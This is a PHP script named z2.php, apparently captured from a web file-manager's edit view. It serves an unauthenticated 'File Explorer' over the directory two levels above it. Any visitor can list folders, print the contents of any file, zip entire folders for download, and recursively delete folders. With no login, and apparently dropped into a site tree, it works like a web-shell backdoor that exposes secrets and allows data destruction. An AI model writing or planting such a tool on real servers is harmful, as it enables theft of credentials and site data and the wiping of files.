File Manager
Editing: z2.php
<?php $base = realpath(dirname(__DIR__, 2)); function deleteFolder($dir) { if (!is_dir($dir)) { return; } $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deleteFolder($path); } else { unlink($path); } } rmdir($dir); } function zipFolder($source, $destination) { $zip = new ZipArchive(); if ($zip->open($destination, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) { return false; } $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $source, RecursiveDirectoryIterator::SKIP_DOTS ), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $file) { if ($file->isDir()) { continue; } $filePath = $file->getRealPath(); $relativePath = substr( $filePath, strlen($source) + 1 ); $zip->addFile($filePath, $relativePath); } $zip->close(); return true; } /* |-------------------------------------------------------------------------- | Actions |-------------------------------------------------------------------------- */ if ($_SERVER['REQUEST_METHOD'] === 'POST') { $folder = $_POST['folder'] ?? ''; $action = $_POST['action'] ?? ''; $folderPath = realpath($base . '/' . $folder); if ( $folderPath === false || strpos($folderPath, $base) !== 0 || !is_dir($folderPath) ) { die('Invalid folder'); } if ($action === 'zip') { $zipFile = $folderPath . '.zip'; if (!zipFolder($folderPath, $zipFile)) { die('Failed to create ZIP'); } } if ($action === 'delete') { deleteFolder($folderPath); } header( "Location: " . $_SERVER['PHP_SELF'] . (!empty($_GET['dir']) ? '?dir=' . urlencode($_GET['dir']) : '') ); exit; } /* |-------------------------------------------------------------------------- | Current Path |-------------------------------------------------------------------------- */ $dir = $_GET['dir'] ?? ''; $file = $_GET['file'] ?? ''; $currentPath = realpath($base . '/' . $dir); if ( $currentPath === false || strpos($currentPath, $base) !== 0 ) { die('Access denied'); } ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>File Explorer</title> <style> body{ font-family:Arial,sans-serif; margin:20px; } ul{ list-style:none; padding:0; } li{ margin:8px 0; } pre{ background:#111; color:#0f0; padding:15px; overflow:auto; border-radius:5px; } button{ margin-left:5px; cursor:pointer; } </style> </head> <body> <h2>File Explorer</h2> <?php /* |-------------------------------------------------------------------------- | File View |-------------------------------------------------------------------------- */ if (!empty($file)) { $filePath = realpath($currentPath . '/' . $file); if ( $filePath === false || strpos($filePath, $base) !== 0 || !is_file($filePath) ) { die('Invalid file'); } echo '<h3>Viewing: ' . htmlspecialchars($file) . '</h3>'; echo '<pre>'; echo htmlspecialchars(file_get_contents($filePath)); echo '</pre>'; echo '<p>'; echo '<a href="?dir=' . urlencode($dir) . '">⬅ Back</a>'; echo '</p>'; exit; } /* |-------------------------------------------------------------------------- | Directory View |-------------------------------------------------------------------------- */ echo '<h3>Directory: ' . htmlspecialchars($dir ?: '/') . '</h3>'; echo '<ul>'; if ($dir !== '') { $parent = dirname($dir); if ($parent === '.') { $parent = ''; } echo '<li>'; echo '<a href="?dir=' . urlencode($parent) . '">⬅ Back</a>'; echo '</li>'; } $files = scandir($currentPath); foreach ($files as $f) { if ($f === '.' || $f === '..') { continue; } $full = $currentPath . '/' . $f; $relative = trim($dir . '/' . $f, '/'); if (is_dir($full)) { echo '<li>'; echo '📁 '; echo '<a href="?dir=' . urlencode($relative) . '">'; echo htmlspecialchars($f) . '/'; echo '</a>'; echo ' <form method="post" style="display:inline;"> <input type="hidden" name="folder" value="' . htmlspecialchars($relative, ENT_QUOTES) . '"> <button type="submit" name="action" value="zip" onclick="return confirm(\'Create ZIP archive?\')"> 📦 Zip </button> <button type="submit" name="action" value="delete" onclick="return confirm(\'Delete folder and all contents?\')"> 🗑 Delete </button> </form>'; echo '</li>'; } else { echo '<li>'; echo '📄 '; echo '<a href="?dir=' . urlencode($dir) . '&file=' . urlencode($f) . '">'; echo htmlspecialchars($f); echo '</a>'; echo '</li>'; } } echo '</ul>'; ?> </body> </html>
💾 Save
⬅ Back